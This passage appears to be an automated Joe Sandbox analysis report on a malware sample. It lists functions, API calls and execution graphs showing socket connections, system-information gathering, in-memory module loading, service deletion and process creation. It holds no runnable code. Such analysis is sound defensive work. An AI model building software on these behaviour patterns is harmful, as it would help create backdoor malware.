                                                                                          • Opcode ID: 1d9d4e6a103436fa6d4a87c3801ee709b09ed6f15207dc39c5cfe36b8e263f2a
                                                                                          • Instruction ID: 35b040e23320f7c57e1bee8842fc800d469dc723e7eedb9ee6c7bb718427654e
                                                                                          • Opcode Fuzzy Hash: 1d9d4e6a103436fa6d4a87c3801ee709b09ed6f15207dc39c5cfe36b8e263f2a
                                                                                          • Instruction Fuzzy Hash: CDF09671E80304B7EB10AE609D47B6A36685B21745F2040BBF904772D2F67E7725529D
                                                                                          Function 00402A60 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 109 402a60-402a75 #1576
                                                                                          APIs
                                                                                          • #1576.MFC42(00402A06,00402A06,00402A06,00402A06,00402A06,00000000,?,0000000A), ref: 00402A70
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: #1576
                                                                                          • String ID:
                                                                                          • API String ID: 1976119259-0
                                                                                          • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                                          • Instruction ID: 2e8f5fa0b2b7dc8462a5570c84725da21d48d42b60ee068d54710228b117be70
                                                                                          • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                                          • Instruction Fuzzy Hash: BFB00836118386ABCB12EE95890592ABAA6BB98304F484C1DB2A1500A287668428EB16

                                                                                          Non-executed Functions

                                                                                          Function 00402400 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsIconic.USER32(E8844D8D), ref: 0040240E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Iconic
                                                                                          • String ID:
                                                                                          • API String ID: 110040809-0
                                                                                          • Opcode ID: 1ee85660d1dedbebd5f403de0e96ef1f5b119a627276ba2acc2b378afb4465c5
                                                                                          • Instruction ID: 5de610e982ba27cc53666b937cb18e62fe31540b2012b128af7b5849c0221d0a
                                                                                          • Opcode Fuzzy Hash: 1ee85660d1dedbebd5f403de0e96ef1f5b119a627276ba2acc2b378afb4465c5
                                                                                          • Instruction Fuzzy Hash: 09C012B090820CAB8708CF98EA00C29BBACEB09301B0002DCF808933008A32AE009A98
                                                                                          Function 0040187B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 63libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 110 40187b-401970 LoadLibraryA GetProcAddress * 4 GetTickCount wsprintfA 115 401972-401979 FreeLibrary 110->115 116 40197f-401982 110->116 115->116
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040188F
                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameA), ref: 004018A7
                                                                                          • GetProcAddress.KERNEL32(?,GetSystemDirectoryA), ref: 004018BF
                                                                                          • GetProcAddress.KERNEL32(?,MoveFileA), ref: 004018D7
                                                                                          • GetProcAddress.KERNEL32(?,MoveFileExA), ref: 004018EF
                                                                                          • GetTickCount.KERNEL32 ref: 00401921
                                                                                          • wsprintfA.USER32 ref: 0040193B
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00401979
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$CountFreeLoadTickwsprintf
                                                                                          • String ID: %s\%d.bak$GetModuleFileNameA$GetSystemDirectoryA$MoveFileA$MoveFileExA$kernel32.dll
                                                                                          • API String ID: 2704705959-706646508
                                                                                          • Opcode ID: 439d6103ebf8e8c0a2e54ea9977356cebfa60b531f2e9e129bb2cebecea63de2
                                                                                          • Instruction ID: 278943a665a34f5de4912a77712433a3c03d867667eba4ba3f010f6a07107de3
                                                                                          • Opcode Fuzzy Hash: 439d6103ebf8e8c0a2e54ea9977356cebfa60b531f2e9e129bb2cebecea63de2
                                                                                          • Instruction Fuzzy Hash: B12151B5D85218ABEB20DF60CC8DBE9BB78EB54701F1041E5A649B2191DBB49FC0CF64
                                                                                          Function 00401C18 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 95libraryloaderstringCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 117 401c18-401ce6 memset * 2 LoadLibraryA GetProcAddress * 3 119 401ce8 117->119 120 401cea-401d12 117->120 121 401d2c-401d59 call 401d3a 119->121 120->121 124 401d14-401d25 lstrcpyA 120->124 127 401d68-401d7b 121->127 128 401d5b-401d62 FreeLibrary 121->128 124->121 128->127
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00401C59
                                                                                          • memset.MSVCRT ref: 00401C69
                                                                                          • LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 00401C76
                                                                                          • GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 00401C8E
                                                                                          • GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 00401CA3
                                                                                          • GetProcAddress.KERNEL32(?,RegCloseKey), ref: 00401CB8
                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 00401D1F
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00401D62
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Librarymemset$FreeLoadlstrcpy
                                                                                          • String ID: ADVAPI32.dll$RegCloseKey$RegOpenKeyExA$RegQueryValueExA
                                                                                          • API String ID: 3313493744-123098875
                                                                                          • Opcode ID: 6cfc459c3633b96d3d6a7f6576698e4911ea3d3d1c7daab3c8c40142335194e9
                                                                                          • Instruction ID: ee5ed84a35279ae09bc0a5aec9c8e8049356c5a81716acae3ba6bb287f67954d
                                                                                          • Opcode Fuzzy Hash: 6cfc459c3633b96d3d6a7f6576698e4911ea3d3d1c7daab3c8c40142335194e9
                                                                                          • Instruction Fuzzy Hash: 93314FB5940218ABDB10DF90DD85FDEBBB8AF48710F10416AF605B62D0D778AE44CF64
                                                                                          Function 004020F5 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 82COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • #355.MFC42(00000000,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 00402133
                                                                                          • #2515.MFC42(00000000,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 00402145
                                                                                          • #540.MFC42(00000000,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 0040217A
                                                                                          • #2818.MFC42(?,00409D58,?,00000000,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 00402190
                                                                                          • #3499.MFC42(?,?,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 004021C5
                                                                                          • #6907.MFC42(?,00000001,00000000,?,?,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 004021FB
                                                                                          • #800.MFC42(?,00000001,00000000,?,?,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 0040220A
                                                                                          • #800.MFC42(?,00000001,00000000,?,?,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 00402216
                                                                                            • Part of subcall function 004022C0: #800.MFC42(?,00000000,00402B79,000000FF,?,0040222D,?,00000001,00000000,?,?,00000000), ref: 004022EC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: #800$#2515#2818#3499#355#540#6907
                                                                                          • String ID: All Files (*.*)|*.*||
                                                                                          • API String ID: 1584807323-1256402831
                                                                                          • Opcode ID: 4922d2615448acd3483173aa7a39ffc0c03dd6e8f39ba40f8db02418d57e1958
                                                                                          • Instruction ID: c5d4932d0e26176f48f047347bf5286b918a9edaf58949088f637132c46f74e5
                                                                                          • Opcode Fuzzy Hash: 4922d2615448acd3483173aa7a39ffc0c03dd6e8f39ba40f8db02418d57e1958
                                                                                          • Instruction Fuzzy Hash: D0316D7198011CABCB14EB94CE5ABEDB774BB10304F1042AEE115772C1DAB41E44CB69
                                                                                          Function 004016EB Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 144 4016eb-401720 call 401e60 _access 147 401722-40172c call 401e20 144->147 148 40172e 144->148 147->148 152 401730-401781 #5683 #4129 call 4016eb #800 call 401e60 _mkdir 147->152 150 401784-401791 148->150 152->150
                                                                                          APIs
                                                                                          • _access.MSVCRT ref: 00401714
                                                                                          • #5683.MFC42(0000005C,?,?,?,?,?,?), ref: 00401735
                                                                                          • #4129.MFC42(?,00000000,0000005C,?,?,?,?,?,?), ref: 00401742
                                                                                          • #800.MFC42(?,00000000,0000005C,?,?,?,?,?), ref: 0040176D
                                                                                          • _mkdir.MSVCRT ref: 0040177B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: #4129#5683#800_access_mkdir
                                                                                          • String ID:
                                                                                          • API String ID: 2252135049-0
                                                                                          • Opcode ID: fe9398ada3c2d6f7717ef24858e2bc8e3691a59763239764df60b612b1b35ab5
                                                                                          • Instruction ID: e64eea6ac71e0944d3c5090b23e1d4b3a6541fea866ff8cfdbd13ca0f40ae5ed
                                                                                          • Opcode Fuzzy Hash: fe9398ada3c2d6f7717ef24858e2bc8e3691a59763239764df60b612b1b35ab5
                                                                                          • Instruction Fuzzy Hash: A71160709001099BCB00EFA5CD45BAEBB79EB00354F10423EF826B72D0DB385A01CB99
                                                                                          Function 00401FC6 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 00402400: IsIconic.USER32(E8844D8D), ref: 0040240E
                                                                                          • #470.MFC42(?), ref: 00402004
                                                                                            • Part of subcall function 004023D0: SendMessageA.USER32(?,00000000,00000000,00000027), ref: 004023EA
                                                                                          • GetSystemMetrics.USER32(0000000B), ref: 0040202A
                                                                                          • GetSystemMetrics.USER32(0000000C), ref: 00402035
                                                                                            • Part of subcall function 00402420: GetClientRect.USER32(?,U @), ref: 00402432
                                                                                            • Part of subcall function 004023A0: DrawIcon.USER32(00000000,?,?,?), ref: 004023BA
                                                                                          • #755.MFC42(?,?,?,?), ref: 004020A8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem$#470#755ClientDrawIconIconicMessageRectSend
                                                                                          • String ID:
                                                                                          • API String ID: 2506822835-0
                                                                                          • Opcode ID: 1c9899e63e8db84197f4d426d0ee9b49cb4c862dee0a21bfd3b4b5b287d3fdbe
                                                                                          • Instruction ID: 4f4a8c447454e0b861ef3f698e30a861443d70d21ee0d95d9e798c61fe4189de
                                                                                          • Opcode Fuzzy Hash: 1c9899e63e8db84197f4d426d0ee9b49cb4c862dee0a21bfd3b4b5b287d3fdbe
                                                                                          • Instruction Fuzzy Hash: 15212D719001099BCB14EFB4DE4ABEDB774BB08304F14826EE515B32D1DF786904CB58

                                                                                          Non-executed Functions

                                                                                          Function 054ED50B Relevance: 1.5, Strings: 1, Instructions: 274COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2940590142.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_54e0000_Synaptics.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #28
                                                                                          • API String ID: 0-3617282389
                                                                                          • Opcode ID: 92fd416d7204f29dbb9520438ccbe2311b85cead8b3d2b40539c6881818c90dd
                                                                                          • Instruction ID: 0f361d851a32ffbf2df937e5c1037acb3045c5d3151cfb79a4848a0df0860fd4
                                                                                          • Opcode Fuzzy Hash: 92fd416d7204f29dbb9520438ccbe2311b85cead8b3d2b40539c6881818c90dd
                                                                                          • Instruction Fuzzy Hash: A1613F2141E3E19FC3179F3899546C2BFB4BE8B32075806DED8C18F263E325648AC392

                                                                                          Execution Graph

                                                                                          Execution Coverage:10%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:15.7%
                                                                                          Total number of Nodes:642
                                                                                          Total number of Limit Nodes:4
                                                                                          execution_graph 1291 10002182 1296 1000219e 1291->1296 1294 10002191 ??3@YAXPAX 1295 10002198 1294->1295 1297 100021a8 __EH_prolog 1296->1297 1298 100021e5 1297->1298 1299 100021c7 TerminateThread CloseHandle 1297->1299 1302 1000388a CloseHandle 1298->1302 1299->1298 1299->1299 1301 1000218a 1301->1294 1301->1295 1302->1301 1303 10004c46 ??1type_info@@UAE 1304 10004c55 ??3@YAXPAX 1303->1304 1305 10004c5c 1303->1305 1304->1305 1233 10004e0a 1234 10004e1d 1233->1234 1239 10004e26 1233->1239 1236 10004e4e 1234->1236 1248 10003822 1234->1248 1235 10004e42 1252 10004d5f 1235->1252 1239->1234 1239->1235 1239->1236 1242 10004e6e 1242->1236 1243 10004e77 1242->1243 1245 10004d5f 3 API calls 1243->1245 1244 10004e66 1246 10004d5f 3 API calls 1244->1246 1247 10004e7f 1245->1247 1246->1242 1247->1236 1249 10003832 1248->1249 1250 1000383c 1248->1250 1259 10003e6b 1249->1259 1250->1236 1250->1242 1250->1244 1253 10004d67 1252->1253 1254 10004d9d 1253->1254 1255 10004d88 malloc 1253->1255 1257 10004dc7 1253->1257 1254->1234 1255->1254 1256 10004da1 _initterm 1255->1256 1256->1254 1257->1254 1258 10004df4 free 1257->1258 1258->1254 1260 10003e74 1259->1260 1261 10003e78 71 API calls 1259->1261 1260->1250 1261->1250 1306 1000428a 1312 10004c68 1306->1312 1308 10004294 memcpy SetEvent 1309 100042c4 1308->1309 1310 100042ca 1308->1310 1313 10004467 LoadLibraryA GetProcAddress GetProcAddress GetProcAddress 1309->1313 1312->1308 1314 100044d9 1313->1314 1317 100044ef 1314->1317 1319 10004369 7 API calls 1314->1319 1323 1000451a 1317->1323 1320 100043ea 1319->1320 1326 1000444c 1320->1326 1324 10004506 1323->1324 1325 1000451f FreeLibrary 1323->1325 1324->1310 1325->1324 1327 10004450 FreeLibrary 1326->1327 1328 10004457 1326->1328 1327->1328 1329 10004437 1328->1329 1330 1000445d FreeLibrary 1328->1330 1329->1317 1330->1329 1331 100025ca memcpy MessageBoxA 1332 10001014 1337 10001030 1332->1337 1335 10001023 ??3@YAXPAX 1336 1000102a 1335->1336 1338 1000101c 1337->1338 1339 1000103d VirtualFree 1337->1339 1338->1335 1338->1336 1339->1338 1340 10002c96 strlen 1341 10002d31 1340->1341 1342 10002cad ??2@YAPAXI memcpy strrchr 1340->1342 1343 10002d24 1342->1343 1344 10002cd5 1342->1344 1346 10002d26 ??3@YAXPAX 1343->1346 1351 10004529 LoadLibraryA GetProcAddress 1344->1351 1346->1341 1350 10002ced CreateProcessA 1350->1346 1352 10004571 1351->1352 1353 10004597 1352->1353 1354 10004578 GetProcAddress 1352->1354 1355 10002cdc 1353->1355 1356 1000459b FreeLibrary 1353->1356 1357 10004590 1354->1357 1355->1343 1367 1000248b GetFileAttributesA 1355->1367 1356->1355 1357->1353 1358 100045a9 CreateFileA 1357->1358 1359 10004637 Sleep GetProcAddress 1358->1359 1363 100045c5 1358->1363 1361 1000464e 1359->1361 1360 100045ca memset GetProcAddress 1360->1363 1361->1355 1364 10004657 FreeLibrary 1361->1364 1362 10004606 WriteFile 1362->1363 1366 1000462b CloseHandle 1362->1366 1363->1360 1363->1362 1365 10004628 1363->1365 1364->1355 1365->1366 1366->1359 1368 100024a5 1367->1368 1369 1000249a GetLastError 1367->1369 1368->1343 1368->1350 1369->1368 1370 10002d99 1371 10003e12 1370->1371 1372 10003e29 FreeLibrary 1371->1372 1373 10003e2c 1371->1373 1372->1373 1374 10003e33 FreeLibrary 1373->1374 1375 10003e36 1373->1375 1374->1375 1376 10003e40 1375->1376 1377 10003e3d FreeLibrary 1375->1377 1378 10003e47 FreeLibrary 1376->1378 1379 10003e4a 1376->1379 1377->1376 1378->1379 1380 10003e51 FreeLibrary 1379->1380 1381 10003e54 1379->1381 1380->1381 1382 10003e5b FreeLibrary 1381->1382 1383 10003e5e 1381->1383 1382->1383 1384 1000139a 1389 100013b6 1384->1389 1387 100013b0 1388 100013a9 ??3@YAXPAX 1388->1387 1403 10004c68 1389->1403 1391 100013c0 WaitForSingleObject 1392 100013f0 CloseHandle CloseHandle WSACleanup 1391->1392 1393 100013e9 1391->1393 1395 10001030 ctype VirtualFree 1392->1395 1404 1000180a setsockopt CancelIo InterlockedExchange closesocket SetEvent 1393->1404 1396 10001414 1395->1396 1397 10001030 ctype VirtualFree 1396->1397 1398 10001420 1397->1398 1399 10001030 ctype VirtualFree 1398->1399 1400 1000142c 1399->1400 1401 10001030 ctype VirtualFree 1400->1401 1402 100013a2 1401->1402 1402->1387 1402->1388 1403->1391 1404->1392 1405 1000389c 1406 100038b3 1405->1406 1417 100039ab 1405->1417 1407 100038c4 VirtualAlloc 1406->1407 1406->1417 1408 100038e1 VirtualAlloc 1407->1408 1409 100038f5 GetProcessHeap HeapAlloc VirtualAlloc VirtualAlloc memcpy 1407->1409 1408->1409 1408->1417 1418 100039ba 1409->1418 1412 10003961 1423 10003b9e LoadLibraryA GetProcAddress 1412->1423 1414 10003988 1414->1417 1436 10003d5d 1414->1436 1419 100039e3 1418->1419 1420 10003a62 1418->1420 1419->1420 1421 10003a25 VirtualAlloc memcpy 1419->1421 1422 10003a05 VirtualAlloc memset 1419->1422 1420->1412 1421->1419 1422->1419 1427 10003cb5 1423->1427 1429 10003be6 1423->1429 1424 10003cc4 FreeLibrary 1425 1000397d 1424->1425 1425->1414 1431 10003a67 1425->1431 1426 10003c0a LoadLibraryA 1426->1427 1428 10003c1e realloc 1426->1428 1427->1424 1427->1425 1428->1427 1428->1429 1429->1426 1429->1427 1430 10003c81 GetProcAddress 1429->1430 1430->1429 1432 10003b1f 1431->1432 1435 10003a88 1431->1435 1432->1414 1433 10003aad VirtualFree 1433->1435 1434 10003af8 VirtualProtect 1434->1435 1435->1432 1435->1433 1435->1434 1437 10003dd3 1436->1437 1440 10003d69 1436->1440 1437->1417 1438 10003db0 1441 10003dc4 GetProcessHeap HeapFree 1438->1441 1442 10003db7 VirtualFree 1438->1442 1439 10003da5 free 1439->1438 1440->1438 1440->1439 1443 10003d98 FreeLibrary 1440->1443 1441->1437 1442->1441 1443->1440 1444 1000315d 1447 100042ee CreateEventA _beginthreadex WaitForSingleObject CloseHandle 1444->1447 1446 10003170 WaitForSingleObject CloseHandle 1447->1446 1448 10002d9e 1449 10002da8 __EH_prolog 1448->1449 1450 10002db2 wsprintfA CreateMutexA 1449->1450 1451 10002df0 GetLastError 1450->1451 1452 10002e12 1450->1452 1451->1452 1454 10002dfd ReleaseMutex CloseHandle 1451->1454 1473 100012d4 1452->1473 1472 10002f56 1454->1472 1455 10002e28 rand Sleep 1456 10002e3d lstrcatA strcmp 1455->1456 1457 10002e84 GetTickCount 1456->1457 1467 10002e1b 1456->1467 1476 10001445 1457->1476 1459 10002ea6 GetTickCount 1486 10002144 1459->1486 1462 10002f0a WaitForSingleObject Sleep 1462->1467 1464 10002f33 1508 1000180a setsockopt CancelIo InterlockedExchange closesocket SetEvent 1464->1508 1465 1000219e ctype 3 API calls 1465->1467 1467->1455 1467->1456 1467->1459 1467->1462 1467->1464 1467->1465 1491 100036ba memset wsprintfA lstrlenA 1467->1491 1507 1000180a setsockopt CancelIo InterlockedExchange closesocket SetEvent 1467->1507 1468 10002f3b 1469 1000219e ctype 3 API calls 1468->1469 1470 10002f4a 1469->1470 1471 100013b6 ctype 10 API calls 1470->1471 1471->1472 1474 100012de __EH_prolog 1473->1474 1475 1000131c _CxxThrowException WSAStartup CreateEventA memcpy 1474->1475 1475->1467 1509 1000180a setsockopt CancelIo InterlockedExchange closesocket SetEvent 1476->1509 1478 10001455 ResetEvent socket 1479 100014b7 1478->1479 1480 10001477 gethostbyname 1478->1480 1479->1467 1480->1479 1481 10001486 htons connect 1480->1481 1481->1479 1482 100014bb setsockopt 1481->1482 1483 10001508 1482->1483 1484 100014db WSAIoctl 1482->1484 1510 100042ee CreateEventA _beginthreadex WaitForSingleObject CloseHandle 1483->1510 1484->1483 1511 10003842 1486->1511 1488 10002150 1489 1000216c 1488->1489 1490 1000215d lstrcpyA 1488->1490 1489->1467 1490->1489 1515 10004822 9 API calls 1491->1515 1497 100037a4 GlobalMemoryStatusEx 1498 100037c4 1497->1498 1534 100031d2 6 API calls 1498->1534 1507->1467 1508->1468 1509->1478 1510->1479 1514 10001a39 1511->1514 1513 10003858 CreateEventA 1513->1488 1514->1513 1516 100048f8 1515->1516 1517 100048fc 1516->1517 1521 100049aa 1516->1521 1523 1000499f 1516->1523 1524 10004932 1516->1524 1518 1000372e memset getsockname memcpy 1517->1518 1519 10004a5d FreeLibrary 1517->1519 1526 100035ea 1518->1526 1519->1518 1520 10004a3b lstrcpyA 1520->1517 1521->1517 1522 10004a04 wsprintfA 1521->1522 1522->1517 1523->1517 1523->1520 1524->1517 1524->1523 1525 1000498f strchr 1524->1525 1525->1524 1527 10004822 13 API calls 1526->1527 1528 1000360b lstrlenA 1527->1528 1529 10003627 GetVersionExA 1528->1529 1530 1000361b gethostname 1528->1530 1531 1000358c 1529->1531 1530->1529 1532 10004822 13 API calls 1531->1532 1533 100035c2 GetSystemInfo wsprintfA 1532->1533 1533->1497 1535 1000322b 1534->1535 1536 100032e2 FreeLibrary 1535->1536 1537 100032e5 1535->1537 1539 1000325d 1535->1539 1536->1537 1538 100032ea FreeLibrary 1537->1538 1537->1539 1538->1539 1540 1000366a LoadLibraryA GetProcAddress GetProcAddress 1539->1540 1541 1000369e 1540->1541 1542 100036b2 1541->1542 1543 100036ab FreeLibrary 1541->1543 1544 10003629 1542->1544 1543->1542 1545 10004822 13 API calls 1544->1545 1546 1000364a lstrlenA 1545->1546 1547 10003668 lstrcpyA 1546->1547 1548 1000365a lstrcpyA 1546->1548 1549 10001863 1547->1549 1548->1547 1578 100012a4 1549->1578 1552 10001883 ??2@YAPAXI 1554 10001895 memcpy 1552->1554 1555 10001978 1552->1555 1553 1000193a 1556 1000104c 6 API calls 1553->1556 1581 1000104c 1554->1581 1555->1467 1558 10001947 1556->1558 1560 100012a4 VirtualFree 1558->1560 1562 1000194f 1560->1562 1561 1000104c 6 API calls 1563 100018c4 1561->1563 1564 1000104c 6 API calls 1562->1564 1565 1000104c 6 API calls 1563->1565 1569 1000195a 1564->1569 1566 100018d1 1565->1566 1567 1000104c 6 API calls 1566->1567 1568 100018e5 1567->1568 1570 1000104c 6 API calls 1568->1570 1587 1000199f 1569->1587 1571 100018f0 ??3@YAXPAX ??2@YAPAXI memcpy 1570->1571 1573 100012a4 VirtualFree 1571->1573 1574 1000191c 1573->1574 1575 1000104c 6 API calls 1574->1575 1576 10001929 1575->1576 1576->1569 1577 1000192f ??3@YAXPAX 1576->1577 1577->1569 1579 100012bc 1578->1579 1580 100012ae VirtualFree 1578->1580 1579->1552 1579->1553 1580->1579 1582 10001055 1581->1582 1594 10001155 1582->1594 1585 10001068 1585->1561 1586 1000106c memcpy 1586->1585 1591 100019b5 1587->1591 1588 100019ff 1590 10001a06 send 1588->1590 1592 10001a1f 1588->1592 1589 100019ca send 1589->1591 1590->1588 1590->1592 1591->1588 1591->1589 1591->1592 1593 100019ea Sleep 1591->1593 1592->1555 1593->1588 1593->1591 1595 10001164 1594->1595 1596 10001172 ceil _ftol VirtualAlloc 1595->1596 1597 10001063 1595->1597 1596->1597 1598 100011b4 1596->1598 1597->1585 1597->1586 1599 100011c2 memcpy 1598->1599 1600 100011cf 1598->1600 1599->1600 1600->1597 1601 100011d6 VirtualFree 1600->1601 1601->1597 1602 10002f67 1607 100020c8 6 API calls 1602->1607 1604 10002f6c 1608 10001f48 strlen 1604->1608 1607->1604 1609 10001f58 1608->1609 1617 10001fb6 1608->1617 1618 10001acf OpenSCManagerA 1609->1618 1612 10001fa1 1628 10004a93 7 API calls 1612->1628 1613 10001f77 OpenServiceA 1614 10001f99 CloseServiceHandle 1613->1614 1615 10001f8b DeleteService CloseServiceHandle 1613->1615 1614->1612 1615->1614 1619 10001b56 OpenSCManagerA 1618->1619 1620 10001aeb OpenServiceA 1618->1620 1619->1612 1619->1613 1621 10001b01 QueryServiceStatus 1620->1621 1622 10001b49 CloseServiceHandle 1620->1622 1623 10001b10 1621->1623 1624 10001b42 CloseServiceHandle 1621->1624 1622->1619 1623->1624 1625 10001b16 ControlService 1623->1625 1624->1622 1625->1624 1626 10001b27 1625->1626 1626->1624 1627 10001b2d Sleep QueryServiceStatus 1626->1627 1627->1626 1632 10004b1d 1628->1632 1629 10004c01 FreeLibrary 1630 10004c08 1629->1630 1630->1617 1631 10004bd0 lstrlenA 1633 10004b20 1631->1633 1632->1631 1632->1633 1633->1629 1633->1630 1634 1000152b 1635 10001538 1634->1635 1636 10001563 select 1635->1636 1639 10001590 memset recv 1635->1639 1640 100015eb 1635->1640 1642 10001603 1635->1642 1636->1635 1637 100015ed 1636->1637 1669 1000180a setsockopt CancelIo InterlockedExchange closesocket SetEvent 1637->1669 1639->1635 